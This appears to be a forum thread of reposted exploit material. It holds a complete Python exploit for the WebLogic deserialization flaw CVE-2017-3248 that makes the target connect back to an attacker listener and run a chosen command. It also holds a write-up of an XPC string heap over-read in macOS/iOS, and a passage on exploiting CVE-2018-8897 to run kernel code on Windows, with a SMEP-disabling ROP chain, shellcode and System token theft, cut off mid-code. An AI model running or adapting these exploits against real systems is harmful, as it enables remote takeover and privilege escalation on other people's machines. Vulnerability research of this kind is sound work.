  8. #!/usr/bin/python # -*- coding: utf-8 -*- from argparse import RawTextHelpFormatter import socket, argparse, subprocess, ssl, os.path HELP_MESSAGE = ''' -------------------------------------------------------------------------------------- Developped by bobsecq: quentin.hardy@protonmail.com (quentin.hardy@bt.com) This script is the first public exploit/POC for: - Exploiting CVE-2017-3248 (Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization Remote Code Execution) - Checking if a weblogic server is vulnerable This script needs the last version of Ysoserial (https://github.com/frohoff/ysoserial) Version affected (according to Oracle): - 10.3.6.0 - 12.1.3.0 - 12.2.1.0 - 12.2.1.1 -------------------------------------------------------------------------------------- ''' ''' Tested on 12.1.2.0 For technical information, see: - https://www.tenable.com/security/research/tra-2017-07 - http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html Vulnerability identified by Jacob Baines (Tenable Network Security) but exploit/POC has not been published! ''' #COMMANDS ARGS_YSO_GET_PAYLOD = "JRMPClient {0}:{1} |xxd -p| tr -d '\n'" #{0}: IP, {1}: port for connecting 'back' (i.e. attacker IP) CMD_GET_JRMPCLIENT_PAYLOAD = "java -jar {0} {1}"# {0} YSOSERIAL_PATH, {1}ARGS_YSO_GET_PAYLOD CMD_YSO_LISTEN = "java -cp {0} ysoserial.exploit.JRMPListener {1} {2} '{3}'"# {0} YSOSERIAL_PATH, {1}PORT, {2}payloadType, {3}command #PAYLOADS #A. Packet 1 to send: payload_1 = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a' #B. Packet 2 to send: payload_2 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e32323700124141414141414141414141413154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3131312e3131312e302e31313161863d1d0000000078' #C. Packet 3 to send: #C.1 length payload_3_1 = "000003b3" #C.2 first part payload_3_2 = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000' #C.3.1 sub payload payload_3_3_1 = 'aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' #C.3.2 Ysoserial Payload generated in real time payload_3_3_2 = "" #C.4 End of the payload payload_3_4 = 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' def runCmd(cmd): proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout_value = proc.stdout.read() + proc.stderr.read() return stdout_value def getJrmpClientPayloadEncoded(attackerIp, attackerJRMPListenerPort, ysoPath): completeCmd = CMD_GET_JRMPCLIENT_PAYLOAD.format(ysoPath, ARGS_YSO_GET_PAYLOD.format(attackerIp, attackerJRMPListenerPort)) print "[+] Ysoserial command (JRMP client): {0}".format(repr(completeCmd)) stdout = runCmd(cmd = completeCmd) return stdout def exploit(targetIP, targetPort, attackerIP, attackerJRMPPort, cmd, testOnly=False, payloadType='CommonsCollections5', sslEnabled=False, ysoPath=""): if testOnly == True: attackerIP = "127.0.0.1" attackerJRMPPort = 0 print "[+] Connecting to {0}:{1} ...".format(targetIP, targetPort) if sslEnabled == True: print "[+] ssl mode enabled" s = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] ssl mode disabled" s.connect((targetIP, targetPort)) print "[+] Connected to {0}:{1}".format(targetIP, targetPort) print "[+] Sending first packet..." #print "[S1] Sending {0}".format(repr(payload_1.decode('hex'))) s.sendall(payload_1.decode('hex')) data = s.recv(4096) #print '[R1] Received', repr(data) print "[+] Sending second packet..." #print "[S2] Sending {0}".format(repr(payload_2.decode('hex'))) s.sendall(payload_2.decode('hex')) data = s.recv(4096) #print '[R2] Received', repr(data) print "[+] Generating with ysoserial the third packet which contains a JRMPClient payload..." payload_3_3_2 = getJrmpClientPayloadEncoded(attackerIp=attackerIP, attackerJRMPListenerPort=attackerJRMPPort, ysoPath=ysoPath) payload= payload_3_1 + payload_3_2 + payload_3_3_1 + payload_3_3_2 + payload_3_4 payload = payload.replace(payload_3_1, "0000{:04x}".format(len(payload)/2), 1) sendata = payload.decode('hex') if testOnly == False: print "[+] You have to execute the following command locally:" print " {0}".format(CMD_YSO_LISTEN.format(ysoPath, attackerJRMPPort, payloadType,cmd)) raw_input("[+] Press Enter when this previous command is running...") print "[+] Sending third packet..." #print "[S3] Sending {0}".format(repr(sendata)) s.sendall(sendata) data = s.recv(4096) s.close() #print '[R3] Received', repr(data) if testOnly == True: if "cannot be cast to weblogic" in str(data): print "[+] 'cannot be cast to weblogic' string in the third response from server" print "\n{2}\n[-] target {0}:{1} is not vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60) else: print "[+] 'cannot be cast to weblogic' string is NOT in the third response from server" print "\n{2}\n[+] target {0}:{1} is vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60) else: print "[+] The target will connect to {0}:{1}".format(attackerIP, attackerJRMPPort) print "[+] The command should be executed on the target after connection on {0}:{1}".format(attackerIP, attackerJRMPPort) def main(): argsParsed = argparse.ArgumentParser(description=HELP_MESSAGE, formatter_class=RawTextHelpFormatter) argsParsed.add_argument("-t", dest='target', required=True, help='target IP') argsParsed.add_argument("-p", dest='port', type=int, required=True, help='target port') argsParsed.add_argument("--jip", dest='attackerIP', required=False, help='Local JRMP listener ip') argsParsed.add_argument("--jport", dest='attackerPort', type=int, default=3412, required=False, help='Local JRMP listener port (default: %(default)s)') argsParsed.add_argument("--cmd", dest='cmdToExecute', help='Command to execute on the target') argsParsed.add_argument("--check", dest='check', action='store_true', default=False, help='Check if vulnerable') argsParsed.add_argument("--ssl", dest='sslEnabled', action='store_true', default=False, help='Enable ssl connection') argsParsed.add_argument("--ysopath", dest='ysoPath', required=True, default=False, help='Ysoserial path') argsParsed.add_argument("--payloadType", dest='payloadType', default="CommonsCollections5", help='Payload to use in JRMP listener (default: %(default)s)') args = dict(argsParsed.parse_args()._get_kwargs()) if os.path.isfile(args['ysoPath'])==False: print "[-] You have to give the path to Ysoserial with --ysopath (https://github.com/frohoff/ysoserial)!" return -1 if args['check'] == False and args['attackerIP'] == None: print "[-] You have to give an IP with --jip !" return -1 elif args['check'] == False and args['cmdToExecute'] == None: print "[-] You have to give a command to execute on the target with --cmd !" return -1 if args['check'] == True: print "[+] Checking if target {0}:{1} is vulnerable to CVE-2017-3248 without executing a system command on the target...".format(args['target'], args['port']) exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=None, attackerJRMPPort=None, cmd=None, testOnly=True, sslEnabled=args['sslEnabled'], ysoPath=args['ysoPath']) else: print "[+] Exploiting target {0}:{1}...".format(args['target'], args['port']) exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=args['attackerIP'], attackerJRMPPort=args['attackerPort'], cmd=args['cmdToExecute'], payloadType=args['payloadType'], testOnly=False, sslEnabled=args['sslEnabled'],ysoPath=args['ysoPath']) if __name__ == "__main__": main() Sursa: https://www.exploit-db.com/exploits/44998/?rss&amp;utm_source=dlvr.it&amp;utm_medium=twitter
  9. Reading process memory using XPC strings by Brandon Azad July 9, 2018 This is a short post about another bug I discovered mostly by accident. While reversing libxpc, I noticed that XPC string deserialization does not check whether the deserialized string is actually as long as the serialized length claims: it could be shorter. That is, the serialized XPC message might claim that the string is 1000 bytes long even though the string contains a null byte at index 100. The resulting OS_xpc_string object will then think its C string on the heap is longer than it actually is. While directly exploitating this vulnerability to execute arbitrary code is difficult, there’s another path we can take. The length field of an OS_xpc_string object is trusted when serializing the string into a message, so if we can get an XPC service to send us back the string it just deserialized, it will over-read from the heap C-string buffer and send us all of that extra data in the message, giving us a snapshot of that process’s heap memory. The resulting exploit primitive is similar to how the Heartbleed vulnerability could be used to over-read heap data from an OpenSSL-powered server’s memory. (XP)C strings and null bytes I was actually disassembling libxpc in order to understand the wire format when I noticed a peculiarity about the string deserialization function, _xpc_string_deserialize: OS_xpc_string *__fastcall _xpc_string_deserialize(OS_xpc_serializer *xserializer) { OS_xpc_string *xstring; // rbx@1 char *string; // rax@4 char *contents; // [rsp+8h] [rbp-18h]@1 size_t size; // [rsp+10h] [rbp-10h]@1 MAPDST xstring = 0LL; contents = 0LL; size = 0LL; if ( _xpc_string_get_wire_value(xserializer, (const char **)&contents, &size) ) { if ( contents[size - 1] || (string = _xpc_try_strdup(contents)) == 0LL ) { xstring = 0LL; } else { xstring = _xpc_string_create(string, size - 1); LOBYTE(xstring->flags) |= 1u; } } return xstring; } If you look carefully, you’ll notice that a particular check is missing. The function _xpc_string_get_wire_value seems to get a pointer to the data bytes of the string and the reported length of the string. The code then checks whether the byte at index size - 1 is null before duplicating the string and creating the actual OS_xpc_string object with _xpc_string_create, passing the duplicated string and size - 1. The check that contents is null does ensure that the serialized string is no longer than size bytes, but it does not ensure that the string is not shorter than size bytes: there could be a null byte earlier in the serialized string data. This is problematic because the unchecked size value gets propagated to the resulting OS_xpc_string object through the function _xpc_string_create, which leads to inconsistencies between the string object’s reported length and actual length on the heap. Exploitation by XPC message reflection Any nontrivial exploit would have to leverage the disagreement between the resulting XPC string object’s length and the contents of its heap buffer. This means that we need to find code in some XPC service that uses both length field and the string contents in a significant way. Unfortunately, usage patterns that could lead to memory corruption seemed unlikely; you’d need to write some pretty convoluted code to make a too-short string overwrite a buffer: xpc_object_t string = xpc_dictionary_get_value(message, "key"); char buf[strlen(xpc_string_get_string_ptr(string))]; memcpy(buf, xpc_string_get_string_ptr(string), xpc_string_get_length(string)); Not surprisingly, I couldn’t find any iOS services that use XPC strings in a way that could lead to memory corruption. However, there’s still another way to exploit this bug to perform useful work, and that’s by leveraging libxpc’s own behavior in services that reflect XPC messages back to the client. Even though no clients of libxpc use an OS_xpc_string object’s length field in a significant way, there are parts of the libxpc library itself that do: in particular, the XPC string serialization code does trust the stored length field while copying the string contents into the XPC message. This is the decompiled implementation of _xpc_string_serialize: void __fastcall _xpc_string_serialize(OS_xpc_string *string, OS_xpc_serializer *serializer) { int type; // [rsp+8h] [rbp-18h]@1 int size; // [rsp+Ch] [rbp-14h]@1 type = *((_DWORD *)&OBJC_CLASS___OS_xpc_string + 10); _xpc_serializer_append(serializer, &type, 4uLL, 1, 0, 0); size = LODWORD(string->length) + 1; _xpc_serializer_append(serializer, &size, 4uLL, 1, 0, 0); _xpc_serializer_append(serializer, string->string, string->length + 1, 1, 0, 0); } The OS_xpc_string’s length parameter is trusted when serializing the string, causing that many bytes to be copied from the heap into the serialized message. If the deserialized string was shorter than its reported length, the message will be filled with out-of-bounds heap data. Exploitation is still limited to XPC services that reflect some part of the XPC message back to the client, but this is much more common. Targeting diagnosticd On macOS and iOS, diagnosticd is a promising candidate for exploitation, not least because it is unsandboxed, root, and task_for_pid-allow. Diagnosticd is responsible for processing diagnostic messages (for example, messages generated by os_log) and streaming them to clients interested in receiving these messages. By registering to receive our own diagnostic stream and then sending a diagnostic message with a shorter than expected string, we can obtain a snapshot of some of the data in diagnosticd’s heap, which can aid in getting code execution in the process. I wrote up a proof-of-concept exploit called xpc-string-leak that can be used to sample arbitrarily-sized sections of out-of-bounds heap content from diagnosticd. The exploit flow is fairly straightforward: we register a Mach port with diagnosticd to receive a stream of diagnostic messages from our own process, generate a diagnostic message with a malformed too-short string, then listen on the port we registered earlier for the message from diagnosticd containing out-of-bounds heap data. Interestingly, because diagnosticd receives logging messages from other processes, it is possible that the out-of-bounds heap data might contain sensitive information from other processes as well. Thus, there are user privacy implications to this bug even without achieving code execution in diagnosticd. Timeline I discovered this bug early in 2018 (January or February), but forgot to investigate it until May. I reported the issue to Apple on May 9, and it was assigned CVE-2018-4248 and patched in iOS 11.4.1 and macOS 10.13.6 on July 9. Sursa: http://bazad.github.io/2018/07/xpc-string-leak/
  10. Arbitrary Code Execution at Ring 0 using CVE-2018-8897 Can BölükMay 11, 201871324.7k Just a few days ago, a new vulnerability allowing an unprivileged user to run #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that’s exactly what I’m going to attempt doing in this post. Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by “simulating” this situation. Final source code can be found at the bottom. 0x0: Setting Up the Basics The fundamentals of this exploit is really simple unlike the exploitation of it. When stack segment is changed –whether via MOV or POP– until the next instruction completes interrupts are deferred. This is not a microcode bug but rather a feature added by Intel so that stack segment and stack pointer can get set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode. We can create a deferred-to-CPL0 exception by setting debug registers in such a way that during the execution of stack-segment changing instruction a #DB will raise and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As it is mentioned by the everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted. All of this can be done in a few lines like shown below: #include <Windows.h> #include <iostream> void main() { static DWORD g_SavedSS = 0; _asm { mov ax, ss mov word ptr [ g_SavedSS ], ax } CONTEXT Ctx = { 0 }; Ctx.Dr0 = ( DWORD ) &g_SavedSS; Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ); Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; SetThreadContext( HANDLE( -2 ), &Ctx ); PVOID FakeGsBase = ...; _asm { mov eax, FakeGsBase ; Set eax to fake gs base push 0x23 push X64_End push 0x33 push X64_Start retf X64_Start: __emit 0xf3 ; wrgsbase eax __emit 0x0f __emit 0xae __emit 0xd8 retf X64_End: ; Vulnerability mov ss, word ptr [ g_SavedSS ] ; Defer debug exception int 3 ; Execute with interrupts disabled nop } } This example is 32-bit for the sake of showing ASM and C together, the final working code will be 64-bit. Now let’s start debugging, we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic, almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx. We can utilize a small IDA script to step to relevant parts faster: #include <idc.idc> static main() { Message( "--- Step Till Next GS ---\n" ); while( 1 ) { auto Disasm = GetDisasmEx( GetEventEa(), 1 ); if ( strstr( Disasm, "gs:" ) >= Disasm ) break; StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); } } 0x1: Fixing the KPCR Data Here are the few cases we have to modify GSBASE contents to pass through successfully: – KiDebugTrapOrFault KiDebugTrapOrFault: ... MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80. – KiExceptionDispatch KiExceptionDispatch: ... MEMORY:FFFFF8018C20DB5F mov rax, gs:188h MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8 Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h. – KiDispatchException KiDispatchException: ... MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188 MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h] This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it. KeCopyLastBranchInformation: ... MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20 MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h] 0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it. – RtlDispatchException This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do? There’s a weird check in the middle of the function: char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3) { ... if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) ) { ... } else { *v5 = 5; result = 1; *v3 = 0xFFFFFFFFFFFFFFFFi64; *v4 = 0xFFFF800000000000i64; } return result; } Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException. – KeBugCheckEx We are finally here. Here’s the last thing we need to fix: MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20 MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h] MEMORY:FFFFF8018C1FB95A call RtlCaptureContext Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now. 0x2: and Write|What|Where And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time. I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit: #include <idc.idc> static main() { Message( "--- Logging Points of Interest ---\n" ); while( 1 ) { auto IP = GetEventEa(); auto Disasm = GetDisasmEx( IP, 1 ); if ( ( strstr( Disasm, "gs:" ) >= Disasm ) || ( strstr( Disasm, "jmp r" ) >= Disasm ) || ( strstr( Disasm, "call r" ) >= Disasm ) || ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) || ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ) { Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm ); } StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); if( IP == ... ) break; } } To my disappointment, there is no convenient jumps or calls. The whole output is: - KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h - sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h -- KiExceptionDispatch (+5f): mov rax, gs:188h --- KiDispatchException (+48): mov rax, gs:188h --- KiDispatchException (+5c): inc gs:5D30h ---- KeCopyLastBranchInformation (+38): mov rax, gs:20hh ---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h ---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h --- KeBugCheckEx (+1a): mov rcx, gs:20h This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it. I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses: NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit). However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do. To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made. .text:000000014017595F mov rcx, gs:20h .text:0000000140175968 add rcx, 100h .text:000000014017596F call KiSaveProcessorControlState .text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp .text:0000000140175C80 ; KeSaveStateForHibernate+ECp ... .text:0000000140175C80 mov rax, cr0 .text:0000000140175C83 mov [rcx], rax .text:0000000140175C86 mov rax, cr2 .text:0000000140175C89 mov [rcx+8], rax .text:0000000140175C8D mov rax, cr3 .text:0000000140175C90 mov [rcx+10h], rax .text:0000000140175C94 mov rax, cr4 .text:0000000140175C97 mov [rcx+18h], rax .text:0000000140175C9B mov rax, cr8 .text:0000000140175C9F mov [rcx+0A0h], rax We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4. To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it. Thread logic will be like the following: volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context ); while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP uint64_t StackInitial = Ctx->Rsp; while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference // between sequential KiDebugTrapOrFault StackDelta = Ctx->Rsp - StackInitial; PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at NextRetPtrStorage &= ~0xF; *( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode. The final chain will look something like: -- &retn; (fffff80372e9502d) -- &retn; (fffff80372e9502d) -- &pop rcx; retn; (fffff80372ed9122) -- cr4_nosmep (00000000000506f8) -- &mov cr4, rcx; retn; (fffff803730045c7) -- &KernelShellcode (00007ff613fb1010) In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below: NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0; using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup ); NON_PAGED_DATA BYTE IRetToVulnStub[] = { 0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4 0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack 0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup 0xFB, // sti ; enable interrupts 0x48, 0xCF // iretq ; interrupt return }; NON_PAGED_CODE void KernelShellcode() { __writedr( 7, 0 ); uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 ); __writecr4( Cr4Old & ~( 1 << 20 ) ); __swapgs(); uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38; // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 && ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF ) { __rollback_isr( IsrStackIterator ); // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 ) { /* fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap fffff00e`d7a1bc40 0000000000000010 fffff00e`d7a1bc48 0000000000000002 fffff00e`d7a1bc50 fffff00ed7a1bc68 fffff00e`d7a1bc58 0000000000000000 fffff00e`d7a1bc60 0000000000000014 fffff00e`d7a1bc68 00007ff7e2261e95 -- fffff00e`d7a1bc70 0000000000000033 fffff00e`d7a1bc78 0000000000000202 fffff00e`d7a1bc80 000000ad39b6f938 */ IsrStackIterator = IsrStackIterator + 0x30; break; } IsrStackIterator -= StackDelta; } PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) ); Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) ); // ------ KERNEL CODE ------ .... // ------ KERNEL CODE ------ __swapgs(); ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1; ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup ); } We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete! Let’s make a simple demo stealing the System token: uint64_t SystemProcess = *k_PsInitialSystemProcess; uint64_t CurrentProcess = k_PsGetCurrentProcess(); uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess ); uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess ); for ( int i = 0; i < 0x500; i += 0x8 ) { uint64_t Member = *( uint64_t * ) ( 